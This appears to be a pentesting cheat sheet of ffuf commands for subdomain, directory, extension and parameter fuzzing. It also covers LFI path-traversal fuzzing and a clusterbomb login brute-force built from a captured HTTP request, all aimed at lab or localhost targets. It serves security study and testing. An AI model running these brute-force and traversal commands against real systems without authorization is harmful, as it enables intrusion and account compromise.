Saltar a contenido

Essential FFuF

Subdomain Enumeration

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.machine.htb/
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://FUZZ.machine.htb/

Directory Fuzzing with Small Wordlist

ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt:FUZZ -u http://localhost:8080/FUZZ

File Extension Fuzzing

ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://localhost:8080/indexFUZZ

Specific File Format Fuzzing

ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt:FUZZ -u http://localhost:8080/FUZZ.aspx
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost:8080/FUZZ.cgi

Parameter Fuzzing with Custom Filter

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://localhost:8080/file.php?FUZZ=id' -fs 2309

LFI Fuzzing with Custom Wordlist

#https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://localhost:8080/index.php?view=FUZZ' -fs 2309

ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://localhost:8080/index.php?language=../../../../FUZZ' -fs 2287

Brute-Force with Request File from BurpSuite

POST /login HTTP/1.1
Host: 10.10.10.10
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json
Origin: http://10.10.10.10
Referer: http://10.10.10.10/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"username":"USERFUZZ","password":"PASSFUZZ"}

ffuf -request request.txt -request-proto http -mode clusterbomb -w /path/to/users/file.txt:USERFUZZ -w /path/to/password/file.txt:PASSFUZZ -mc 200